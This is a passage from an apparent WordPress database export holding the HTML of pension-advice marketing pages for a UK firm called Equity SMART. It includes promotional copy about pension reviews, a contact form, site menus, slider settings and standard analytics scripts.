href=\"../pensions/income-drawdown/\">Income Drawdown</a> <br />&#13;\n    an alternative</p></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"154\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td rowspan=\"5\" valign=\"top\"> </td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"71\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td><img src=\"../images/spacer.gif\" width=\"1\" height=\"108\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td><img src=\"../images/spacer.gif\" width=\"1\" height=\"24\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td><img src=\"../images/spacer.gif\" width=\"1\" height=\"58\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"3\" valign=\"top\"> </td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"24\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"><img name=\"investments_r14_c1\" src=\"../images/investments_r14_c1.jpg\" width=\"950\" height=\"8\" border=\"0\" id=\"investments_r14_c1\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"8\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td rowspan=\"2\"><img name=\"investments_r15_c1\" src=\"../images/investments_r15_c1.jpg\" width=\"10\" height=\"245\" border=\"0\" id=\"investments_r15_c1\" alt=\"\" /></td>&#13;\n   <td rowspan=\"2\"><img name=\"investments_r15_c2\" src=\"../images/investments_r15_c2.jpg\" width=\"18\" height=\"245\" border=\"0\" id=\"investments_r15_c2\" alt=\"\" /></td>&#13;\n   <td colspan=\"10\"><h2>more information on Pension Advice...</h2></td>&#13;\n   <td rowspan=\"2\"><img name=\"investments_r15_c13\" src=\"../images/investments_r15_c13.jpg\" width=\"11\" height=\"245\" border=\"0\" id=\"investments_r15_c13\" alt=\"\" /></td>&#13;\n   <td colspan=\"3\"><div class=\"moreinfo\">Contact Us for Advice</div></td>&#13;\n   <td rowspan=\"2\"><img name=\"investments_r15_c17\" src=\"../images/investments_r15_c17.jpg\" width=\"19\" height=\"245\" border=\"0\" id=\"investments_r15_c17\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"54\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"10\" valign=\"top\"><div class=\"paracontent2\">&#13;\n      <p>As a business owner how are you preparing for the future?  You may have considered selling your business at retirement and living off the  proceeds, but what are the risks in seeing out this plan if your business  fails, or the future value of your business does not provide the level of income  you had planned for a comfortable retirement.</p>&#13;\n      <p> Income from state pensions is simply not enough to let you  enjoy your retirement with the level of financial comfort you may be planning  for that’s why joining a dedicated pension scheme or plan is highly advisable.</p>&#13;\n      <p> Why not take control of you future today and take advantage  of the generous tax incentives on offer?</p>&#13;\n      <p>Although dividends on shares are taxed  at 10% you will receive tax relief at the highest rate on the contributions you  make and benefit from any profit from the money invested in your pension scheme  being tax free.</p>&#13;\n      </div></td>&#13;\n    <td colspan=\"3\" valign=\"top\"><div class=\"form\" id=\"form\" style=\"width:310; height:125px; text-align: right; font-size:12px; color:#600000; font-weight:bold; margin-left:6px\"> &#13;\n      <form action=\"../thank-you/\" method=\"post\" name=\"form\" id=\"form\" onsubmit=\"MM_validateForm(\'name\',\'\',\'R\',\'surname\',\'\',\'R\',\'telephone\',\'\',\'NisNum\');return document.MM_returnValue\"><table width=\"280\" border=\"0\" cellpadding=\"1\" cellspacing=\"5\"><tr><td width=\"117\" style=\"text-align: left\">First name:&#13;\n            <input name=\"name\" type=\"text\" id=\"name\" size=\"17\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n          <td width=\"168\" style=\"text-align: left\">Surname:&#13;\n            <br /><input name=\"surname\" type=\"text\" id=\"surname\" size=\"17\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n          </tr><tr><td style=\"text-align: left\"> Email:<br /><input name=\"email\" type=\"text\" id=\"email\" size=\"17\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n          <td style=\"text-align: left\">Daytime Telephone:&#13;\n            <input name=\"telephone\" type=\"text\" id=\"telephone\" size=\"17\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n          </tr><tr><td style=\"text-align: left\">Evening Telephone:&#13;\n            <input name=\"telephone2\" type=\"text\" id=\"telephone2\" size=\"17\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n          <td style=\"text-align: left\">Postcode:<br /><input name=\"postcode\" type=\"text\" id=\"postcode\" size=\"17\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n          </tr><tr><td style=\"text-align: left\">Date of Birth:&#13;\n            <input name=\"dob\" type=\"text\" id=\"dob\" style=\"border-color:#999; border-width:thin; border-style:solid;\" value=\"dd/mm/yy\" size=\"17\" /></td>&#13;\n          <td style=\"text-align: left\">Intestested In?<br /><label>&#13;\n              <select name=\"interested\" id=\"interested\"><option value=\"--\" selected=\"selected\">--</option><option value=\"stake\">stake holder</option><option value=\"company\">company</option><option value=\"pension\">pension transfer</option><option value=\"release\">pension release</option><option value=\"personal\">personal pension</option><option value=\"children\">childrens pension</option></select></label></td>&#13;\n          </tr><tr><td style=\"text-align: left\"></td>&#13;\n          <td style=\"text-align: left\"><label>&#13;\n            <input name=\"submit\" type=\"image\" id=\"submit\" value=\"Submit\" src=\"../images/submit.jpg\" alt=\"Savings &amp; Investments\" align=\"right\" /></label> </td>&#13;\n          </tr></table></form></div>&#13;\n      <div class=\"additional\">&#13;\n        <p> </p>&#13;\n        <p> </p>&#13;\n        <p> </p>&#13;\n      </div></td>&#13;\n    <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"191\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><!-- <tr>\r\n    <td></td>\r\n    <td></td>\r\n    <td colspan=\"14\" valign=\"top\"><table width=\"900\" border=\"0\" cellspacing=\"0\" cellpadding=\"4\" style=\"border-style:dashed; border-color:#999; border-width:1px;\">\r\n      <tr>\r\n        <td width=\"26\" bgcolor=\"#E1E1E1\"></td>\r\n        <td width=\"272\" valign=\"bottom\" bgcolor=\"#E1E1E1\"><h3 style=\"color:#600\">additional reading </p>\r\n          <p><a href=\"../additional/what-pension\">what is a pension?</a><br />\r\n            <a href=\"../additional/pension-tax-relief.htm\">pension tax relief</a><br />\r\n            <a href=\"../additional/what-annuity\">what is an annuity?</a><br />\r\n            <a href=\"../additional/myths-about-pensions.htm\">myths about pensions</a><br/>\r\n            <a href=\"../additional/pension-release-under-55.htm\">access to pension before age 55</a><br/>\r\n            <a href=\"../additional/baby-boomers-retiring.htm\">Baby Boomers Retiring</a><br />\r\n            <a href=\"../additional/pensions-in-the-case-of-divorce.htm\">Pensions in the case of Divorce</a><br />\r\n             <a href=\"../additional/fixed-protection-for-pensions.htm\">Fixed Protection for Pensions</a><br />\r\n            <a href=\"../additional/automatic-enrolment.htm\">Automatic Enrolment</a><br />\r\n            <a href=\"../additional/lifetime-allowance-case-studies.htm\">Lifetime Allowance - Case Studies</a></p></td>\r\n        <td width=\"291\" valign=\"bottom\" bgcolor=\"#E1E1E1\"><p><a href=\"../additional/pensions-divorce.htm\"></a><a href=\"../additional/sipp-tax-relief.htm\">The Power of Tax Relief into your SIPP</a><br/>\r\n           <a href=\"pension-transfer.htm\">Pension Transfer</a><br />\r\n         <a href=\"../additional/retirement-scheme.htm\">Pension Scheme Retirement Ages</a><br />        \r\n          <a href=\"../additional/pensions-divorce.htm\">The Pensions &amp; Divorce Process</a><br/>\r\n          <a href=\"../additional/drawdown-annuities.htm\">The Right Time to Annuitise?</a><br/><a href=\"../additional/auto-enrolment-recommendations.htm\">Auto Enrolment - Review &amp; Recommendations</a><br />\r\n          <a href=\"../additional/fixed-protection-deadline.htm\">Fixed Protection Deadline</a> <br />\r\n          <a href=\"../additional/pensions-after-you-die.htm\">Pensions After You Die</a><br />\r\n          <a href=\"../additional/standard-lifetime-allowance.htm\">Standard Lifetime Allowance</a></p></td>\r\n        <td width=\"277\" valign=\"bottom\" bgcolor=\"#E1E1E1\"><a href=\"../additional/5-things-state-pension.htm\">5 things you wont know about State Pensions!</a><br/>\r\n           <a href=\"../pensions/auto-enrolment-and-your-employees.htm\">Auto Enrolment and Your Employees</a> <br />\r\n          <a href=\"../additional/lifetime-allowance-for-pension-savings.htm\">Lifetime Allowance for Pension Savings</a><br />\r\n          <a href=\"../additional/employers-plan-for-auto-enrolment.htm\">Employers Plan for Auto Enrolment</a> <br />\r\n          <a href=\"../additional/autoenrolment-planb.htm\">Auto Enrolment &ndash; What\'s Plan B?</a> <br />\r\n          <a href=\"../additional/nests-more-info.htm\">More Information on NESTs</a><br />\r\n          <a href=\"pensions/auto-enrolment.htm\">Auto Enrolment</a><br />\r\n          <a href=\"additional/lifetime-allowance.htm\">Lifetime Allowance</a><br />\r\n          <a href=\"../additional/trustee-autoenrolment.htm\">5 step action checklist for trustees</a><br/>\r\n          </p></td>\r\n      </tr>\r\n    </table></td>\r\n    <td></td>\r\n    <td></td>\r\n  </tr> --><tr><td colspan=\"17\"><img name=\"investments_r17_c1\" src=\"../images/investments_r17_c1.jpg\" width=\"950\" height=\"6\" border=\"0\" id=\"investments_r17_c1\" alt=\"\" /></td>&#13;\n    <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"6\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\" valign=\"top\" style=\"background-image:url(../images/index_r16_c1.jpg); background-repeat:no-repeat; color:#333;\"><div class=\"footerlinks\"><a href=\"../site-map/\">sitemap</a> - <a href=\"../privacy-policy/\">privacy policy</a> - <a href=\"/\">testimonials</a></div><div class=\"footertext\"><br /></div></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"75\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr></table></div>&#13;\n<script type=\"text/javascript\"><![CDATA[\r\nvar gaJsHost = ((\"https:\" == document.location.protocol) ? \"https://ssl.\" : \"http://www.\");\r\ndocument.write(unescape(\"%3Cscript src=\'\" + gaJsHost + \"google-analytics.com/ga.js\' type=\'text/javascript\'%3E%3C/script%3E\"));\r\n]]></script><script type=\"text/javascript\"><![CDATA[\r\ntry {\r\nvar pageTracker = _gat._getTracker(\"UA-10958181-3\");\r\npageTracker._trackPageview();\r\n} catch(err) {}]]></script><script type=\"text/javascript\"><![CDATA[\r\n   var adiInit =\"488\";\r\n   (function() {\r\n      var adiSrc = document.createElement(\"script\"); adiSrc.type = \"text/javascript\";\r\n      adiSrc.async = true;\r\n      adiSrc.src = (\"https:\" == document.location.protocol ? \"https://\" : \"http://\") + \"static.adinsight.eu/static/scripts/adiTrack.min.js\";\r\n      var s = document.getElementsByTagName(\"script\")[0];\r\n      s.parentNode.insertBefore(adiSrc, s);\r\n   })();\r\n]]></script></body>','Pension Advice - Will you have enough income when you retire?','At Equity SMART we offer pension advice on all aspects of your retirement planning.  Contact us on 01272 225114 to speak with one of our experts.','publish','closed','closed','','pension-advice-will-you-have-enough-income-when-you-retire','','','2017-09-21 16:34:37','2017-09-21 16:34:37','',0,'http://www.equalitywalk.org.uk/pension-advice-will-you-have-enough-income-when-you-retire',0,'page','',0),(95,1,'2017-09-21 16:34:37','2017-09-21 16:34:37','<body class=\"page page-id-25 page-parent page-template page-template-full-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-25 current_page_item menu-item-has-children menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									&#13;\n				<!-- START REVOLUTION SLIDER 3.0.95 fullwidth mode -->&#13;\n				&#13;\n								&#13;\n								<div id=\"rev_slider_29_1_wrapper\" class=\"rev_slider_wrapper fullwidthbanner-container\" style=\"margin:0px auto;background-color:#E9E9E9;padding:0px;margin-top:0px;margin-bottom:0px;max-height:370px;\">&#13;\n					<div id=\"rev_slider_29_1\" class=\"rev_slider fullwidthabanner\" style=\"display:none;max-height:370px;height:370;\">						&#13;\n										<ul><li data-transition=\"fade\" data-slotamount=\"7\">&#13;\n						&#13;\n														<div class=\"tp-caption large_text fade\" data-x=\"53\" data-y=\"74\" data-speed=\"300\" data-start=\"0\" data-easing=\"easeOutBack\">Pensions 					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption black fade\" data-x=\"54\" data-y=\"193\" data-speed=\"600\" data-start=\"7000\" data-easing=\"easeOutBack\"><a href=\"../contact-us/\" class=\"button large green\">Get Advice Today!</a>					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption small_text sfl\" data-x=\"52\" data-y=\"119\" data-speed=\"300\" data-start=\"0\" data-easing=\"easeOutBack\">If you are planning towards your retirement or are now at retirement,<br/>our wealth planners will help you reinvigorate existing pensions and<br/> invest new money to get you on track to reach your retirement goals.					 					 </div>&#13;\n				&#13;\n									</li>&#13;\n								</ul></div>&#13;\n				</div>				&#13;\n							&#13;\n			<script type=\"text/javascript\"><![CDATA[\r\n\r\n				var tpj=jQuery;\r\n				\r\n									tpj.noConflict();\r\n								\r\n				var revapi29;\r\n				\r\n				tpj(document).ready(function() {\r\n				\r\n				if (tpj.fn.cssOriginal != undefined)\r\n					tpj.fn.css = tpj.fn.cssOriginal;\r\n				\r\n				if(tpj(\'#rev_slider_29_1\').revolution == undefined)\r\n					revslider_showDoubleJqueryError(\'#rev_slider_29_1\');\r\n				else\r\n				   revapi29 = tpj(\'#rev_slider_29_1\').show().revolution(\r\n					{\r\n						delay:9000,\r\n						startwidth:1000,\r\n						startheight:370,\r\n						hideThumbs:200,\r\n						\r\n						thumbWidth:100,\r\n						thumbHeight:50,\r\n						thumbAmount:1,\r\n						\r\n						navigationType:\"bullet\",\r\n						navigationArrows:\"solo\",\r\n						navigationStyle:\"round\",\r\n						\r\n						touchenabled:\"on\",\r\n						onHoverStop:\"on\",\r\n						\r\n						navigationHAlign:\"center\",\r\n						navigationVAlign:\"bottom\",\r\n						navigationHOffset:0,\r\n						navigationVOffset:20,\r\n\r\n						soloArrowLeftHalign:\"left\",\r\n						soloArrowLeftValign:\"center\",\r\n						soloArrowLeftHOffset:20,\r\n						soloArrowLeftVOffset:0,\r\n\r\n						soloArrowRightHalign:\"right\",\r\n						soloArrowRightValign:\"center\",\r\n						soloArrowRightHOffset:20,\r\n						soloArrowRightVOffset:0,\r\n								\r\n						shadow:0,\r\n						fullWidth:\"on\",\r\n						fullScreen:\"off\",\r\n\r\n						stopLoop:\"off\",\r\n						stopAfterLoops:-1,\r\n						stopAtSlide:-1,\r\n\r\n						shuffle:\"off\",\r\n						\r\n						hideSliderAtLimit:0,\r\n						hideCaptionAtLimit:0,\r\n						hideAllCaptionAtLilmit:0,\r\n						startWithSlide:0,\r\n						videoJsPath:\"http://www.equalitywalk.org.uk/wp-content/plugins/revslider/rs-plugin/videojs/\",\r\n						fullScreenOffsetContainer: \"\"	\r\n					});\r\n				\r\n				});	//ready\r\n				\r\n			]]></script><!-- END REVOLUTION SLIDER --></div>&#13;\n																<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-25\" class=\"post-25 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Pensions</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">June 12th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"one_half\"><style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><h2>Is Your Future Financially Secure?</h2><p>We don\'t claim to have a crystal ball and certainly the world has undergone an extreme form of financial stress, which is why knowing if you are on track to meet your retirement goals becomes not a minor benefit, but a crucial necessity for people and pensions of all types and sizes.</p>&#13;\n<p> </p>&#13;\n<p>So what does this mean to you?</p>&#13;\n<p> </p>&#13;\n<p>At no time in recorded history has the need for balanced, objective financial advice been more crucial. Which, quite frankly is why you should invest some time with us to get your FREE Pension Review.</p>&#13;\n<p> </p>&#13;\n<p><b>Managing your pensions is NOT as complex as you think.</b></p>&#13;\n<p> </p>&#13;\n<p>Thanks to our Pension Review, we can make your life simpler. You’ll know exactly what the best choices are and how to make them to ensure a more prosperous retirement.</p>&#13;\n<p> </p>&#13;\n<p>Simply request your <b>FREE</b> Pension Review with a Equity SMART pension expert today by clicking on the get a pension review button to get started.</p>&#13;\n<p/></section></div></div><div class=\"one_half last\"> <div class=\"accordian\"><h5 class=\"toggle active\"><a href=\"#\"><span class=\"arrow\"/>What to expect from your pension review:</a></h5><div class=\"toggle-content default-open\" style=\"display: block;\">&#13;\n<ul><li>Find out exactly how your pension is performing.</li>&#13;\n<li>Your current fund size and projected values to your retirement.</li>&#13;\n<li>What your dependents can expect to receive</li>&#13;\n<li>The investment returns needed to meet your goals.</li>&#13;\n<li>The impact of charges on your pension pot.</li>&#13;\n<li>Help you track down missing or lost pensions.</li>&#13;\n<li>Ensure your pension is as tax efficient as it should be.</li>&#13;\n</ul><p/></div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>2o years established - that counts in pensions</a></h5><div class=\"toggle-content \" style=\"\">This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our conversation.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Promise</a></h5><div class=\"toggle-content \" style=\"\">We stand for honesty – advice – trust and value.  Our culture and people matter regarding what you can expect from us. We promise you this the team that makes Equity SMART work will be centred on you. We believe in treating clients like family, so you can be confident that we’ll give you the same advice we would give to our own relatives.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Pension Review can help you if you are in:</a></h5><div class=\"toggle-content \" style=\"\">&#13;\n<ol><li>A Personal Pension – Private pensions in your name, where you pay money in, you receive tax relief on contributions your pay.</li>&#13;\n<li>A Self Invested Pension Transfer if you are looking to take control of your pension funds and make investment decisions.</li>&#13;\n<li>Final Salary pension and are looking to transfer – These pensions are sometimes known as a Defined Benefit Scheme.</li>&#13;\n<li>A Defined Contribution or an Occupational Money Pension. Whereby both you and your employer contribute to your own pension fund.</li>&#13;\n<li>A Group Personal Pension set up and controlled by you employer with no investment choice or flexibility.</li>&#13;\n<li>An Executive Pension that may be set up on an older style of higher charges &amp; fees that are eroding your pensions pot</li>&#13;\n</ol><p/></div></div>&#13;\n<p style=\"text-align: center;\"/><div class=\"demo-sep sep-none\" style=\"margin-top:18px;\"/><a class=\"button large e.g. green\" href=\"#standard\" target=\"\">Get Your Pension Review</a></div><div class=\"clearboth\"/>&#13;\n<p style=\"text-align: center;\"><big><big><big>Pensions &amp; Pension Planning</big></big></big></p>&#13;\n<p style=\"text-align: center;\">Select the area of pension planning that you are interested in:</p>&#13;\n<p style=\"text-align: center;\"/><div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px\"/>&#13;\n<div class=\"one_third\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n	#imageframe-1.imageframe{float:left;}\r\n	#imageframe-1.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-1.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-1.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-1\" class=\"imageframe imageframe-none\"><a href=\"../pensions/pension-transfer/\"/></span>&#13;\n<h2>Pension Transfer</h2>&#13;\n<p>We can help you choose from the best funds, get the best service, aim for more value, more flexibility and make sure you make the right Pension Transfer Choices<a href=\"../pensions/pension-transfer/\">…find out more…</a></p>&#13;\n</div>&#13;\n<div class=\"one_third\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n	#imageframe-2.imageframe{float:left;}\r\n	#imageframe-2.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-2.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		